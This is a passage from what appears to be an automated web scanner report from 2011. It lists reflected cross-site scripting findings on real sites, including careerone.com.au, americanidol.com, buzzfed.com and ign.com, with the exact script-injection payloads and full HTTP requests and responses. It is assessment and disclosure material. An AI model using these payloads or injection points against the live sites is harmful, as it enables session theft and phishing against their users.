<a href="http://media.sensis.com.au/ADCLICK/CID=0003f40338cd0d3800000000/acc_random8f259"><script>alert(1)</script>4e431d63655=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1" target="_new">
...[SNIP]...

1.61. http://media.sensis.com.au/hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.sensis.com.au
Path:   /hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 303c3"><script>alert(1)</script>c0139512324 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hserver/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1?303c3"><script>alert(1)</script>c0139512324=1 HTTP/1.1
Host: media.sensis.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nrl.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=00038FE653150E8B59BFA3C561626364; LE4=RqrYE1+59N+31+5; LE1=nUsYE1+4GlH+31+5

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Tue, 04 Oct 2011 20:16:38 GMT
X-DirectServer: DS3
Content-Type: text/html
Content-Length: 365
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC"
Connection: close

<a href="http://media.sensis.com.au/ADCLICK/CID=0003f40338cd0d3800000000/acc_random=956894257036/SITE=3RD.BPPROMO.NRL.SPORT/AAMSZ=300x70/AREA=SPORT.NRL.HOME/POSITION=BLW1?303c3"><script>alert(1)</script>c0139512324=1" target="_new">
...[SNIP]...

1.62. http://my.careerone.com.au/services/adservices/getcommonadurl.ashx [applicationid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.careerone.com.au
Path:   /services/adservices/getcommonadurl.ashx

Issue detail

The value of the applicationid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e520"%3balert(1)//60325d708b3 was submitted in the applicationid parameter. This input was echoed as 9e520";alert(1)//60325d708b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/adservices/getcommonadurl.ashx?applicationid=www9e520"%3balert(1)//60325d708b3&path=homepage HTTP/1.1
Host: my.careerone.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.careerone.com.au/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: split_scsjsv=26; WT_FPC=id=10.5.199.242-3607297344.30180036:lv=1317810158620:ss=1317810158620

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIa IVAa IVDa CONo HISa TELo PSAa PSDa DELa UNRa PUBi OTRa BUS LEG PHY ONL UNI PUR COM NAV INT DEM CNT STA HEA PRE GOV OTC
Date: Tue, 04 Oct 2011 20:07:32 GMT
Content-Length: 174

_s.ads.jsAdController.setAdSource("http://ads.monster.com/html.ng/site=auen&affiliate=auen&app=www9e520";alert(1)//60325d708b3&size=0x0&path=homepage&tile=ed68aeacfb0e4cec");

1.63. http://my.careerone.com.au/services/adservices/getcommonadurl.ashx [path parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.careerone.com.au
Path:   /services/adservices/getcommonadurl.ashx

Issue detail

The value of the path request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c5d5"%3balert(1)//83ab68a2ab0 was submitted in the path parameter. This input was echoed as 5c5d5";alert(1)//83ab68a2ab0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /services/adservices/getcommonadurl.ashx?applicationid=www&path=homepage5c5d5"%3balert(1)//83ab68a2ab0 HTTP/1.1
Host: my.careerone.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.careerone.com.au/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: split_scsjsv=26; WT_FPC=id=10.5.199.242-3607297344.30180036:lv=1317810158620:ss=1317810158620

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIa IVAa IVDa CONo HISa TELo PSAa PSDa DELa UNRa PUBi OTRa BUS LEG PHY ONL UNI PUR COM NAV INT DEM CNT STA HEA PRE GOV OTC
Date: Tue, 04 Oct 2011 20:07:46 GMT
Content-Length: 174

_s.ads.jsAdController.setAdSource("http://ads.monster.com/html.ng/site=auen&affiliate=auen&app=www&size=0x0&path=homepage5c5d5";alert(1)//83ab68a2ab0&tile=09446f654f884dc2");

1.64. http://myidol.americanidol.com/ie7-styles.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myidol.americanidol.com
Path:   /ie7-styles.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5314'><script>alert(1)</script>7a8b247438e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ie7-styles.cssb5314'><script>alert(1)</script>7a8b247438e?ver=1236 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: myidol.americanidol.com

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:32:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:32:10 GMT
Content-Length: 1325
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/ie7-styles.cssb5314'><script>alert(1)</script>7a8b247438e?ver=1236'>
...[SNIP]...

1.65. http://myidol.americanidol.com/images/css/newforum.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myidol.americanidol.com
Path:   /images/css/newforum.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1227c'><script>alert(1)</script>7251447615 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/css/newforum.css1227c'><script>alert(1)</script>7251447615?ver=1010 HTTP/1.1
Host: myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760745107%3B%20s_dayslastvisit%3D1317758945123%7C1412366945123%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760745123%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:23:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:19 GMT
Content-Length: 1333
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/images/css/newforum.css1227c'><script>alert(1)</script>7251447615?ver=1010'>
...[SNIP]...

1.66. http://myidol.americanidol.com/images/webfontkit/helveticaneuew02-75bold-webfont.woff [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myidol.americanidol.com
Path:   /images/webfontkit/helveticaneuew02-75bold-webfont.woff

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload acb1a'><script>alert(1)</script>9093560950c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /images/webfontkit/helveticaneuew02-75bold-webfont.woffacb1a'><script>alert(1)</script>9093560950c HTTP/1.1
Host: myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317763429285'%255D%255D%7C1475616229285%3B%20s_vnum%3D1320123600884%2526vn%253D4%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317765229287%3B%20s_dayslastvisit%3D1317763429291%7C1412371429291%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317765229291%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20c_m%3Dundefinedburpburp%3B%20s_sq%3D%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:23:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:29 GMT
Content-Length: 1356
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/images/webfontkit/helveticaneuew02-75bold-webfont.woffacb1a'><script>alert(1)</script>9093560950c'>
...[SNIP]...

1.67. http://myidol.americanidol.com/png_fix.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myidol.americanidol.com
Path:   /png_fix.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b3dd'><script>alert(1)</script>ad5d2697bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /png_fix.css6b3dd'><script>alert(1)</script>ad5d2697bb?ver=1 HTTP/1.1
Host: myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760745107%3B%20s_dayslastvisit%3D1317758945123%7C1412366945123%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760745123%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:23:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:14 GMT
Content-Length: 1318
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/png_fix.css6b3dd'><script>alert(1)</script>ad5d2697bb?ver=1'>
...[SNIP]...

1.68. http://myidol.americanidol.com/tiny-edit.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myidol.americanidol.com
Path:   /tiny-edit.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fea64'><script>alert(1)</script>d9bb724dfee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /tiny-edit.cssfea64'><script>alert(1)</script>d9bb724dfee?ver=1 HTTP/1.1
Host: myidol.americanidol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://widgets.myidol.americanidol.com/tools/keyslave.one?url=aHR0cDovL3dpZGdldHMubXlpZG9sLmFtZXJpY2FuaWRvbC5jb20vcmVkaXJlY3Qub25lP3JlZGlyZWN0X3RvPWh0dHA6Ly93d3cuYW1lcmljYW5pZG9sLmNvbS8.%2527&core_u=faa976043c793de66165b83afd81de19&core_x=3e3d8fc3a1227dd8404b22789c1bc64d&ts=1317758762
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2745A99E051D1536-4000010A2004AB28[CE]; __utma=124250778.1498354944.1317753547.1317756115.1317758789.3; __utmz=124250778.1317758789.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_vnum%3D1320123600884%2526vn%253D3%7C1320123600884%3B%20s_invisit%3Dtrue%7C1317760745107%3B%20s_dayslastvisit%3D1317758945123%7C1412366945123%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317760745123%3B

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Expires: Tue, 04 Oct 2011 21:23:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:23:14 GMT
Content-Length: 1321
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Whoops! Browser Settin
...[SNIP]...
<a href='http://myidol.americanidol.com/tiny-edit.cssfea64'><script>alert(1)</script>d9bb724dfee?ver=1'>
...[SNIP]...

1.69. http://pglb.buzzfed.com/32418/5cca846e8e7b10d1bec731ed34643e04 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /32418/5cca846e8e7b10d1bec731ed34643e04

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload cb42d<script>alert(1)</script>34a3eaad9a8 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /32418/5cca846e8e7b10d1bec731ed34643e04?callback=BF_PARTNER.gate_responsecb42d<script>alert(1)</script>34a3eaad9a8&cb=9694 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Tue, 11 Oct 2011 20:11:28 GMT
Date: Tue, 04 Oct 2011 20:11:28 GMT
Connection: close

BF_PARTNER.gate_responsecb42d<script>alert(1)</script>34a3eaad9a8(1271435081);

1.70. http://pglb.buzzfed.com/32418/774318d75531cfaededa3a9d2cbab383 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /32418/774318d75531cfaededa3a9d2cbab383

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d68f9<script>alert(1)</script>3dce0ab26ea was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /32418/774318d75531cfaededa3a9d2cbab383?callback=BF_PARTNER.gate_responsed68f9<script>alert(1)</script>3dce0ab26ea&cb=2778 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.askmen.com/top_10/cars/fastest-cars-in-the-world.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604791
Expires: Tue, 11 Oct 2011 20:19:42 GMT
Date: Tue, 04 Oct 2011 20:19:51 GMT
Connection: close

BF_PARTNER.gate_responsed68f9<script>alert(1)</script>3dce0ab26ea(1317659916);

1.71. http://pglb.buzzfed.com/39698/6d0094ff6569058b09e6fab4d74b9fcb [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /39698/6d0094ff6569058b09e6fab4d74b9fcb

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 9e793<script>alert(1)</script>ec1ef213b74 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /39698/6d0094ff6569058b09e6fab4d74b9fcb?callback=BF_PARTNER.gate_response9e793<script>alert(1)</script>ec1ef213b74&cb=7694 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/company/about-us.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604797
Expires: Tue, 11 Oct 2011 22:19:54 GMT
Date: Tue, 04 Oct 2011 22:19:57 GMT
Connection: close

BF_PARTNER.gate_response9e793<script>alert(1)</script>ec1ef213b74(1313768178);

1.72. http://pglb.buzzfed.com/39698/6f8f1f6be3a9e039f40348adbcc25b28 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /39698/6f8f1f6be3a9e039f40348adbcc25b28

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 3bb62<script>alert(1)</script>362eec90e89 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /39698/6f8f1f6be3a9e039f40348adbcc25b28?callback=BF_PARTNER.gate_response3bb62<script>alert(1)</script>362eec90e89&cb=7926 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/articles/2011/10/04/the-simpsons-money-dispute-may-shut-down-fox-tv-s-long-running-hit.html?cid=askmentrade
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604775
Expires: Tue, 11 Oct 2011 20:18:08 GMT
Date: Tue, 04 Oct 2011 20:18:33 GMT
Connection: close

BF_PARTNER.gate_response3bb62<script>alert(1)</script>362eec90e89(1317701498);

1.73. http://pglb.buzzfed.com/39698/f959d1ec5ce0f34205021b068f0f6899 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pglb.buzzfed.com
Path:   /39698/f959d1ec5ce0f34205021b068f0f6899

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8220a<script>alert(1)</script>fcd595438a2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /39698/f959d1ec5ce0f34205021b068f0f6899?callback=BF_PARTNER.gate_response8220a<script>alert(1)</script>fcd595438a2&cb=1779 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.thedailybeast.com/company/contact-us.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 79
Cache-Control: max-age=604800
Expires: Tue, 11 Oct 2011 22:17:32 GMT
Date: Tue, 04 Oct 2011 22:17:32 GMT
Connection: close

BF_PARTNER.gate_response8220a<script>alert(1)</script>fcd595438a2(1313768172);

1.74. http://social-services.ign.com/v1.0/social/rest/people/fedreg.150067215/@self [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://social-services.ign.com
Path:   /v1.0/social/rest/people/fedreg.150067215/@self

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 5b910<script>alert(1)</script>c36337bda10 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1.0/social/rest/people/fedreg.150067215/@self?jsonp=jsonp13177588132575b910<script>alert(1)</script>c36337bda10&_=1317758816914 HTTP/1.1
Host: social-services.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.ign.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; rsi_segs=; decc=US; i18n-cc=US; freq=c-1317758771436v-1n-12mc+1317758771436mv+1mn+12wwe~0; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmb=173446715.1.10.1317758813; __utmc=173446715; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317758813760%7C1412366813760%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317760613760%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_c13%3Dwww.ign.com%253Awww.newscorp.com%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
WWW-Authenticate: OAuth realm="shindig"
api-host: media-social-prd-services-02.las1.colo.ignops.com
Content-Type: application/json;charset=UTF-8
Content-Length: 1541
Date: Tue, 04 Oct 2011 20:10:05 GMT

